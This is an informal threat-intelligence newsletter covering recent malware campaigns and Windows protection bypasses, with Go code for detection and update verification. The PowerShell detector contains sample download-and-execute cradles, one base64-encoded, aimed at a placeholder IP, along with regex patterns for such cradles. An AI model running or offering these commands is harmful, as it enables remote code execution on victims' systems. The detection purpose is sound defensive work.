Cyber Deceptions: Weaponized Tools & Stealthy Attacks

Hi, my fellow malware enthusiast,

Yes, yes, I know it’s Saturday, not Thursday; I’m late. No point fussing about it now; what’s done is done! But guess what? You get the chance to enjoy my improved introduction! 😂

I’m sure you’ve been eagerly waiting for this week’s newsletter—there’s a lot to uncover, and I promise it’s worth the wait!👀 From IT tools turned cyber weapons to the latest in APT group tactics, we’ve got a jam-packed edition for you. We’ll dive into how everyday software like NetSupport Manager is being weaponized, expose the design flaws lurking in Windows, and reveal how cloud services are becoming the new playground for stealthy espionage.

So, let’s not delay any further—dive in and enjoy the read!

📰In today’s newsletter

  • NetSupport Manager: From IT Tool to Cyber Weapon

  • StormBamboo’s DNS Poisoning: Unmasking the Malware Campaign

  • APT41's Stealthy Attack on Taiwanese Institute Unveiled

  • APT Groups Embrace Cloud Services for Stealthy Espionage

  • Design Flaws in Windows Smart App Control and SmartScreen Exposed

  • Fighting Ursa Uses Car Ads to Distribute HeadLace Backdoor

  • Unmasking Windows Downgrade Attacks: New Vulnerabilities Exposed

NetSupport Manager: From IT Tool to Cyber Weapon

NetSupport Manager, a legitimate remote administration tool that dates back to 1989, has increasingly been repurposed by cybercriminals as a Remote Access Trojan (RAT). Malicious deployments have been tracked since around 2017, and they grew as remote work surged in the 2020s; the tool now turns up routinely in phishing and drive-by download attacks.

💡We’re not talking about a literal drive-by, guys… We’re talking about malicious programs being installed without your knowledge. Just making sure we’re on the same page😂

In late 2023, a significant campaign emerged in which attackers used fake browser-update lures on compromised websites to deploy NetSupport RAT. The lure handed the victim a PowerShell command that downloaded and installed the tool, giving the attackers remote control of the system. By early 2024, researchers observed that the attackers had refined the chain further to make it harder to detect.

👉For more details, check out this blog written by Christopher Morrison.

Cybercriminals usually take the easiest entry point into an organization. Software vulnerabilities are one common entry point, but sophisticated attacks typically combine several vectors, and many begin by breaching an internet-facing application to establish an initial foothold.

Software vulnerabilities remain a significant risk for several reasons:

  • Vulnerabilities are often discovered only after they have already been exploited.

  • Vendors may delay releasing security updates.

  • Engineers need time to test patches in a staging environment before rolling them into production.

Groups like Muddled Libra have dedicated R&D teams that identify software vulnerabilities and build automated tooling to find and exploit them, and with AI-assisted tooling they can find bugs and target vulnerable systems faster and at larger scale.

StormBamboo’s DNS Poisoning: Unmasking the Malware Campaign

In mid-2023, Volexity investigated multiple incidents in which systems across several organizations were infected with malware linked to the StormBamboo group, also known as Evasive Panda. The malware, which targeted both macOS and Windows, was traced back to DNS poisoning at the internet service provider (ISP) level.

Initially the infection vector was unclear, but Volexity later determined that StormBamboo was altering DNS responses for domains used by automatic software-update checks. The group targeted software with insecure update mechanisms, such as updaters that fetch over plain HTTP and never validate a digital signature on what they receive. That let the attackers substitute malware, including MACMA and POCOSTICK, for the legitimate update.
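To make the failure concrete, here is an added example (my own code, not Volexity's or any vendor's) of the two update clients side by side: one that trusts whatever the poisoned DNS answer delivers, and one that checks an Ed25519 signature from a key compiled into the client, the SHA-256 of the binary, and a release counter so an old signed build cannot be replayed to roll the client back. The manifest format and the "binaries" are constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Manifest is a minimal stand-in for the metadata an update server publishes.
// Constructed for this example; real updaters differ in shape, not in the checks that matter.
type Manifest struct {
	Release   uint64   // monotonically increasing release counter
	Digest    [32]byte // SHA-256 of the update binary
	Signature []byte   // Ed25519 signature over signedBytes(Release, Digest)
}

// signedBytes fixes the exact bytes the vendor signs: release counter plus digest.
func signedBytes(release uint64, digest [32]byte) []byte {
	buf := make([]byte, 8+32)
	binary.BigEndian.PutUint64(buf, release)
	copy(buf[8:], digest[:])
	return buf
}

// SignRelease is the vendor's offline step: sign the digest of a build.
func SignRelease(priv ed25519.PrivateKey, release uint64, blob []byte) Manifest {
	d := sha256.Sum256(blob)
	return Manifest{Release: release, Digest: d, Signature: ed25519.Sign(priv, signedBytes(release, d))}
}

// InsecureUpdate is the pattern StormBamboo abused: fetch over plain HTTP and run
// whatever arrives. Whoever answers the DNS query for the update host (here, the
// ISP's poisoned resolver) decides what gets installed.
func InsecureUpdate(m Manifest, blob []byte) bool {
	return len(blob) > 0 // "looks like a file" is the only check
}

// VerifiedUpdate accepts an update only if the manifest verifies under the vendor
// key pinned in the client, the binary matches the signed digest, and the release
// counter moves forward. A poisoned DNS answer can deliver any manifest and binary,
// but cannot forge the signature or reuse an old signed release to roll the client back.
func VerifiedUpdate(pub ed25519.PublicKey, installed uint64, m Manifest, blob []byte) error {
	if !ed25519.Verify(pub, signedBytes(m.Release, m.Digest), m.Signature) {
		return errors.New("manifest signature does not verify against the pinned vendor key")
	}
	if sha256.Sum256(blob) != m.Digest {
		return errors.New("binary does not match the signed digest")
	}
	if m.Release <= installed {
		return errors.New("release is not newer than the installed one (rollback/replay)")
	}
	return nil
}

func main() {
	vendorPub, vendorPriv, _ := ed25519.GenerateKey(rand.Reader)
	_, attackerPriv, _ := ed25519.GenerateKey(rand.Reader)

	genuine := []byte("genuine updater build 42")       // constructed stand-in for a real binary
	malware := []byte("backdoor disguised as build 42") // what the poisoned DNS answer delivers

	good := SignRelease(vendorPriv, 42, genuine)
	forged := SignRelease(attackerPriv, 42, malware) // attacker can only sign with their own key

	fmt.Println("insecure client installs malware:", InsecureUpdate(forged, malware))
	fmt.Println("verified client rejects forged manifest:", VerifiedUpdate(vendorPub, 41, forged, malware))
	fmt.Println("verified client rejects swapped binary:", VerifiedUpdate(vendorPub, 41, good, malware))
	fmt.Println("verified client accepts genuine build:", VerifiedUpdate(vendorPub, 41, good, genuine))
}
```

The point to take away is that TLS on the download would have helped here but is not the real fix: the signature check binds the update to the vendor's key regardless of which server the client ended up talking to, and the release counter closes the "serve an old, signed, vulnerable build" loophole.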

💡I’m always amazed at how many different DNS attacks can serve as an initial vector

This attack mirrors a previous incident attributed to DriftingBamboo, a possibly related threat actor. In April 2023, ESET speculated about a similar vector; Volexity has now confirmed it, showing that StormBamboo controlled the ISP’s DNS infrastructure and used it to inject malware through poisoned updates. Volexity’s blog post details how these attacks exploited vulnerable software-update mechanisms and what that says about the broader threat landscape.

💡Whenever there’s the word bamboo in the name you know it’s related to a Chinese hacking group😂

👉Check out the blog to learn more about the subject.

APT41's Stealthy Attack on Taiwanese Institute Unveiled

In mid-July 2023, APT41 compromised a Taiwanese research institute in an intrusion that shows how much tooling a modern state-aligned operation brings to bear. The attackers relied on advanced tools and techniques to stay hidden and keep control.

The attackers deployed ShadowPad and Cobalt Strike. The ShadowPad loader abused an outdated, vulnerable Microsoft Office IME binary to load its custom payload, while Cobalt Strike was introduced via the Go-based loader CS-Avoid-Killing, built to evade antivirus detection.

💡Yes, Microsoft again…

Although the exact initial access vector remains unknown, the intrusion involved a web shell used to maintain persistent access and deploy additional payloads, which gave the attackers ongoing control over the compromised environment.

Cisco Talos detected the intrusion in August 2023 after spotting abnormal PowerShell commands that connected to an external IP address to download and execute scripts. The case shows why unusual PowerShell activity is one of the most valuable indicators of a breach in progress.
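Both the NetSupport campaign above (a PowerShell one-liner installing the RAT) and this APT41 case (PowerShell reaching out to an external IP) were caught on the same signal: the PowerShell command line. The following is an added example of my own, not Talos's detection logic or anything from the original page, that scores process-creation command lines with a handful of heuristics and, importantly, decodes `-EncodedCommand` (base64 of UTF-16LE) so an obfuscated download cradle is scored the same as a plain one. The rules, weights and sample command lines are constructed; 203.0.113.0/24 is a documentation address range.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
)

// rule is a regexp, the label that goes into the findings, and a weight.
// Labels and weights are constructed for this example, not a vendor's scoring.
type rule struct {
	re     *regexp.Regexp
	label  string
	weight int
}

var rules = []rule{
	{regexp.MustCompile(`(?i)\s-(w|win|windowstyle)\s+hidden`), "hidden-window", 2},
	{regexp.MustCompile(`(?i)\s-(nop|noprofile)\b`), "no-profile", 1},
	{regexp.MustCompile(`(?i)\s-(ep|executionpolicy)\s+bypass`), "execution-policy-bypass", 2},
	{regexp.MustCompile(`(?i)\b(iex|invoke-expression)\b`), "invoke-expression", 3},
	{regexp.MustCompile(`(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer)`), "download-cradle", 3},
	{regexp.MustCompile(`(?i)https?://(\d{1,3}\.){3}\d{1,3}`), "raw-ip-url", 3},
	{regexp.MustCompile(`(?i)\[system\.reflection\.assembly\]::load|frombase64string`), "in-memory-load", 3},
}

var encodedArg = regexp.MustCompile(`(?i)\s-(encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})`)

// decodeEncodedCommand reverses PowerShell's -EncodedCommand: base64 over UTF-16LE.
func decodeEncodedCommand(b64 string) (string, bool) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(raw)%2 != 0 {
		return "", false
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), true
}

// EncodeCommand builds an -EncodedCommand argument the way PowerShell expects it.
// Used here only to construct a sample log line.
func EncodeCommand(cmd string) string {
	u := utf16.Encode([]rune(cmd))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// ScoreCommandLine returns a risk score and the labels of the rules that fired.
// An encoded command is decoded and the decoded text scanned as well, so
// obfuscation does not hide a download cradle from the rules.
func ScoreCommandLine(cmdline string) (int, []string) {
	text := " " + cmdline
	var findings []string
	score := 0
	if m := encodedArg.FindStringSubmatch(text); m != nil {
		findings = append(findings, "encoded-command")
		score += 2
		if decoded, ok := decodeEncodedCommand(m[2]); ok {
			text += " " + decoded
		}
	}
	for _, r := range rules {
		if r.re.MatchString(text) {
			findings = append(findings, r.label)
			score += r.weight
		}
	}
	return score, findings
}

// HasFinding reports whether a label is among the findings.
func HasFinding(findings []string, label string) bool {
	for _, f := range findings {
		if f == label {
			return true
		}
	}
	return false
}

func main() {
	// Constructed sample process-creation command lines.
	samples := []string{
		`powershell.exe -NoProfile -Command "Get-ChildItem C:\Logs | Measure-Object"`,
		`powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/update.ps1')"`,
		`powershell.exe -nop -w hidden -enc ` + EncodeCommand(`IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/u.ps1')`),
	}
	for _, s := range samples {
		score, why := ScoreCommandLine(s)
		fmt.Printf("score=%2d [%s]\n  %s\n", score, strings.Join(why, ","), s)
	}
}
```

The benign admin command scores 1 (it only uses `-NoProfile`), while the plain and the base64-encoded cradles both land above 10, which is the behaviour you want from a rule that is going to feed an alert: the encoding step that evades a naive string match should not change the verdict.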

👉Want to know more? Dive into the blog for the full scoop!

Signature-based detection is reliable for known threats, but it is not enough on its own. Malware authors evade it by altering code, using polymorphic and metamorphic malware, and exploiting zero-day vulnerabilities that no signature yet covers, so over-reliance on signatures mainly produces false negatives; loosening signatures to compensate then produces false positives that waste analyst time and overwhelm security teams. Protecting against modern threats calls for a layered strategy that adds behavioral analysis, machine learning, and other techniques on top of signatures.

APT Groups Embrace Cloud Services for Stealthy Espionage

Symantec research reveals a rising trend of advanced persistent threat (APT) groups using cloud storage services from Microsoft and Google for command and control (C2) and data exfiltration. This tactic allows attackers to exploit widely trusted services, making their activities less likely to trigger security alerts.

Recent findings show APTs increasingly adopting these techniques. Symantec’s Threat Hunter Team identified several espionage operations using cloud services and noted that attackers benefit from the low cost and from blending into traffic to trusted platforms. The flip side is that once the activity is detected, the provider can suspend the cloud accounts quickly, disrupting the operation and handing defenders valuable information about it.

💡Attackers are really clever, always using new technologies in creative ways!

New malware such as GoGra and Trojan.Grager, both of which use Microsoft’s Graph API for C2, shows how far this has gone. GoGra, used against a South Asian media organization, reads encrypted commands from an Outlook mailbox. Trojan.Grager, which targeted organizations in Taiwan and Vietnam, relies on OneDrive for command execution.

Symantec also found other cloud-based threats, including Onedrivetools and MoonTag, as well as a Google Drive tool used by the Firefly group. The growing number of APT groups adopting these methods shows how quickly a technique that works in one campaign gets copied in others.
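The reason this traffic evades alerts is that graph.microsoft.com and googleapis.com are legitimately busy on every corporate network. What still distinguishes an implant is which process is talking to those hosts and how regularly. Here is an added example, my own code and not Symantec's, that groups proxy or EDR network events by (process, host), discards clients that are expected to use the cloud APIs, and measures how regular the remaining polling is (the coefficient of variation of the gaps; a low value is beacon-like). The host and process allowlists and the sample events are constructed for the example.

```go
package main

import (
	"fmt"
	"math"
	"sort"
	"strings"
	"time"
)

// ProxyEvent is one outbound connection as a web proxy or EDR would record it.
type ProxyEvent struct {
	Time    time.Time
	Host    string
	Process string
	Path    string
}

// cloud API hosts that Graph/Drive-based implants use for tasking (constructed list).
var cloudAPIHosts = map[string]bool{
	"graph.microsoft.com": true, "login.microsoftonline.com": true,
	"www.googleapis.com": true, "oauth2.googleapis.com": true,
}

// processes for which Graph/Drive traffic is expected; anything else is worth a look.
var expectedClients = map[string]bool{
	"outlook.exe": true, "onedrive.exe": true, "teams.exe": true, "msedge.exe": true, "chrome.exe": true,
}

type Finding struct {
	Process, Host string
	Count         int
	MeanInterval  time.Duration
	Jitter        float64 // std dev / mean of the gaps; small means regular, beacon-like polling
}

// FindCloudBeacons keeps unexpected clients of cloud APIs seen at least minCount
// times and reports how regular their polling is, most regular first.
func FindCloudBeacons(events []ProxyEvent, minCount int) []Finding {
	groups := map[[2]string][]time.Time{}
	for _, e := range events {
		if !cloudAPIHosts[strings.ToLower(e.Host)] || expectedClients[strings.ToLower(e.Process)] {
			continue
		}
		k := [2]string{strings.ToLower(e.Process), strings.ToLower(e.Host)}
		groups[k] = append(groups[k], e.Time)
	}
	var out []Finding
	for k, times := range groups {
		if len(times) < minCount {
			continue
		}
		sort.Slice(times, func(i, j int) bool { return times[i].Before(times[j]) })
		gaps := make([]float64, 0, len(times)-1)
		for i := 1; i < len(times); i++ {
			gaps = append(gaps, times[i].Sub(times[i-1]).Seconds())
		}
		mean, sd := meanStd(gaps)
		jitter := 0.0
		if mean > 0 {
			jitter = sd / mean
		}
		out = append(out, Finding{k[0], k[1], len(times), time.Duration(mean * float64(time.Second)), jitter})
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Jitter < out[j].Jitter })
	return out
}

func meanStd(xs []float64) (float64, float64) {
	var sum float64
	for _, x := range xs {
		sum += x
	}
	mean := sum / float64(len(xs))
	var v float64
	for _, x := range xs {
		v += (x - mean) * (x - mean)
	}
	return mean, math.Sqrt(v / float64(len(xs)))
}

// SampleEvents builds a constructed log: Outlook polling Graph (expected), a browser
// touching the Drive API, one PowerShell hit, and an unknown binary polling the
// Graph mailbox endpoint every minute with a couple of seconds of jitter.
func SampleEvents() []ProxyEvent {
	t0 := time.Date(2024, 8, 10, 9, 0, 0, 0, time.UTC)
	var ev []ProxyEvent
	for i := 0; i < 20; i++ {
		jitter := time.Duration(i%3-1) * 2 * time.Second
		ev = append(ev, ProxyEvent{t0.Add(time.Duration(i)*time.Minute + jitter), "graph.microsoft.com", "svchost_update.exe", "/v1.0/me/mailFolders/inbox/messages"})
		ev = append(ev, ProxyEvent{t0.Add(time.Duration(i*37) * time.Second), "graph.microsoft.com", "OUTLOOK.EXE", "/v1.0/me/messages"})
	}
	ev = append(ev, ProxyEvent{t0.Add(5 * time.Minute), "www.googleapis.com", "chrome.exe", "/drive/v3/files"})
	ev = append(ev, ProxyEvent{t0.Add(7 * time.Minute), "graph.microsoft.com", "powershell.exe", "/v1.0/me/drive/root/children"})
	return ev
}

func main() {
	for _, f := range FindCloudBeacons(SampleEvents(), 3) {
		fmt.Printf("%-22s -> %-22s n=%d mean=%v jitter=%.3f\n", f.Process, f.Host, f.Count, f.MeanInterval.Round(time.Second), f.Jitter)
	}
}
```

Only the unknown binary survives the filter: Outlook is expected, the single PowerShell request is below the count threshold, and the roughly 60-second cadence with jitter under 0.1 is what a mailbox-polling implant like GoGra looks like from the network side. Real implants add randomised sleeps, so treat the jitter threshold as a tuning knob rather than a hard line.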

👉Want to know more? You can read the blog about it!

Design Flaws in Windows Smart App Control and SmartScreen Exposed

Cybersecurity researchers have identified vulnerabilities in Microsoft’s Smart App Control (SAC) and SmartScreen that could allow attackers to bypass security checks and gain initial access to systems without triggering warnings.

💡Yes, Microsoft yet again…

SAC, introduced with Windows 11, blocks untrusted apps based on cloud intelligence and digital signatures. SmartScreen, which has shipped with Windows since Windows 8 and is part of Windows 10, evaluates URLs and files using a reputation-based system. When SAC is enabled, it takes over from SmartScreen for file checks.

Elastic Security Labs highlighted several methods attackers use to circumvent these protections, including:

  • Reputation Hijacking: repurposing an application that already has a good reputation (a script host or interpreter, for instance) to run attacker-controlled code.

  • Reputation Seeding: getting attacker-controlled binaries that look benign a good reputation first, then abusing a flaw or feature in them later.

  • Reputation Tampering: modifying a file that already has a good reputation in ways that keep the reputation while inserting malicious code.

  • LNK Stomping: abusing a bug in Windows shortcut (.lnk) handling so that the Mark of the Web, the label that marks a file as downloaded from the internet, is stripped before SmartScreen or SAC ever consult it.

Several of these techniques have been in use for years, which says something about how much weight native reputation checks can carry on their own. The researchers stress that downloads still deserve scrutiny and that built-in protections need to be backed by additional controls.

👉For more details on these bypasses, read Elastic Security Labs’ blog.

Kaspersky’s GReAT team has released their latest quarterly report on APT activity for Q1 2024. Notable findings include the discovery of a new Golang-based backdoor, Durian, used in a supply-chain attack in South Korea, and significant campaigns in the Middle East by groups like Gelsemium. The report also highlights ongoing hacktivist activity, particularly related to the Israel-Hamas conflict, and the expansion of the Spyrtacus malware to target multiple platforms. The report underscores the continued evolution and global reach of APT threats driven by geopolitical and cyberespionage motives.

Fighting Ursa Uses Car Ads to Distribute HeadLace Backdoor

Russian threat actor Fighting Ursa, also known as APT28 or Fancy Bear, has adopted a new tactic to target diplomats: a deceptive used-car sale email. The lure is a .zip file supposedly containing photos of an Audi Q7 Quattro SUV offered for diplomatic use. In reality, the archive holds executables whose .exe extension Windows hides by default.

💡A car for diplomatic use? I guess we learn something new every day!


The email includes a Romanian phone number and contact details for added credibility. Once the victim downloads and opens the file, it deploys the HeadLace backdoor, which establishes persistent access for espionage.

The attack uses a free service called "webhook" to host a malicious HTML page that first checks whether the visiting machine is running Windows. If so, it serves the malicious .zip file. Inside are disguised executables and scripts that load and run the HeadLace backdoor, leading to data theft and surveillance.

Fighting Ursa's use of such tactics is in line with its previous campaigns and highlights the group’s ongoing use of free services to mask its activities. Notably, the lure depends on Windows hiding known file extensions by default, a long-standing weakness that obscures the true nature of these files.
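A mail gateway or sandbox can catch this class of lure before a user ever sees the hidden extension. The following is an added example, my own code rather than anything from Unit 42 or the original page, that walks an archive in memory and flags entry names that only make sense as a disguise: an executable extension behind a decoy image or document extension, a run of spaces pushing the real extension out of view, or a Unicode bidirectional override character in the name. The archive contents are constructed placeholders, not the real lure.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
	"path"
	"strings"
)

// Extensions that Explorer hides when "Hide extensions for known file types" is on
// (the Windows default) and that Windows will execute on double-click.
var executableExt = map[string]bool{
	".exe": true, ".scr": true, ".com": true, ".pif": true, ".bat": true, ".cmd": true,
	".vbs": true, ".js": true, ".jse": true, ".wsf": true, ".hta": true, ".lnk": true, ".msi": true, ".ps1": true,
}

// Decoy extensions that lures stack in front of the real one.
var decoyExt = map[string]bool{
	".jpg": true, ".jpeg": true, ".png": true, ".pdf": true, ".doc": true, ".docx": true, ".txt": true,
}

// InspectName returns the reasons one archive entry name looks like a disguised
// executable. An empty result means nothing suspicious about the name.
func InspectName(name string) []string {
	var reasons []string
	base := path.Base(strings.ReplaceAll(name, `\`, "/"))
	lower := strings.ToLower(base)
	ext := path.Ext(lower)
	stem := strings.TrimSuffix(lower, ext)

	if executableExt[ext] {
		reasons = append(reasons, "executable:"+ext)
		if inner := path.Ext(strings.TrimRight(stem, " ")); decoyExt[inner] {
			reasons = append(reasons, "double-extension:"+inner+ext)
		}
		if strings.HasSuffix(stem, " ") || strings.Contains(stem, "    ") {
			reasons = append(reasons, "padding-spaces-before-extension")
		}
	}
	// U+202E (RLO) and friends reverse the displayed order so "invoice\u202Efdp.exe" renders as "invoiceexe.pdf".
	if strings.ContainsAny(base, "\u202E\u202D\u200E\u200F") {
		reasons = append(reasons, "bidi-override-in-name")
	}
	return reasons
}

// InspectZip runs InspectName over every file entry of an in-memory archive.
func InspectZip(data []byte) (map[string][]string, error) {
	r, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	if err != nil {
		return nil, err
	}
	hits := map[string][]string{}
	for _, f := range r.File {
		if f.FileInfo().IsDir() {
			continue
		}
		if why := InspectName(f.Name); len(why) > 0 {
			hits[f.Name] = why
		}
	}
	return hits, nil
}

// BuildSampleZip constructs a lure-shaped archive in memory: placeholder bytes under
// names modelled on the "photos of a car" disguise. Nothing in it is executable.
func BuildSampleZip() []byte {
	var buf bytes.Buffer
	w := zip.NewWriter(&buf)
	for _, name := range []string{
		"IMG_2024_Q7/IMG_001.jpg.exe",
		"IMG_2024_Q7/IMG_002.jpg                                  .exe",
		"IMG_2024_Q7/price_list.pdf",
		"IMG_2024_Q7/IMG_003.jpg",
		"IMG_2024_Q7/README.txt",
	} {
		f, _ := w.Create(name)
		f.Write([]byte("placeholder"))
	}
	w.Close()
	return buf.Bytes()
}

func main() {
	hits, err := InspectZip(BuildSampleZip())
	if err != nil {
		panic(err)
	}
	for name, why := range hits {
		fmt.Printf("%-60q %v\n", name, why)
	}
}
```

The check is deliberately name-based so it runs before anything is extracted or executed; pair it with content inspection (an MZ header under a .jpg name is the obvious next test) on anything the name check flags.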

Fighting Ursa is known for high-profile attacks, including interference in the 2016 US elections and recent campaigns against Ukrainian government bodies.

👉Want to know more? You can read about it here!

Unmasking Windows Downgrade Attacks: New Vulnerabilities Exposed

Downgrade attacks, or version-rollback attacks, target fully updated software by reverting it to vulnerable older versions, thus allowing exploitation of previously patched flaws. In 2023, the BlackLotus UEFI Bootkit used such an attack to bypass Secure Boot on Windows, revealing the potential of this technique.

Recent research presented at Black Hat USA 2024 and DEF CON 32 (2024) by SafeBreach’s Alon Leviev highlights significant findings regarding downgrade attacks on Windows. The study led to the creation of Windows Downdate, a tool that crafts undetectable and persistent downgrades of critical OS components. With it, an attacker can elevate privileges, bypass security features, and make a fully patched Windows machine vulnerable to thousands of past exploits.

Key findings include:

  1. Windows Update Vulnerability: The research uncovered a flaw in the Windows Update process, allowing undetectable and irreversible downgrades of essential OS components like DLLs, drivers, and the NT kernel.

  2. Virtualization Stack Risk: Downgrades also exposed vulnerabilities in Windows Virtualization-Based Security (VBS), including Credential Guard and Hyper-V’s hypervisor, bypassing UEFI locks without physical access.

  3. Need for Awareness: The findings underscore the necessity for increased awareness and research into downgrade attacks, highlighting that current OS protections may not fully address these threats.

  4. Design Flaws: The research revealed design flaws in Windows’ virtualization stack that let less privileged levels update more privileged components, a reminder that long-standing features can still carry risk.

The study calls for more research into OS-based downgrade attacks and emphasizes the importance of examining in-the-wild attacks to anticipate and mitigate potential threats.

👉Want to know more? You can read about it here!

Security researchers have uncovered the largest known ransomware payment to date—$75 million paid to the Dark Angels group. This discovery, detailed in Zscaler’s ThreatLabz 2024 Ransom Report, raises concerns that other threat actors may replicate these tactics. The report also highlighted an 18% increase in ransomware attacks, with manufacturing, healthcare, technology, and education sectors being the most targeted.

✉️ Wrapping Up

In the world of malware, understanding is key. As we delve into these threats together, remember that knowledge and vigilance are our best allies.

If you find this newsletter helpful and know others who might benefit from it, I'd be grateful if you could pass it along. 🙏

Until next time, stay informed and keep your defenses sharp. Here’s to staying one step ahead!

Thanks for reading!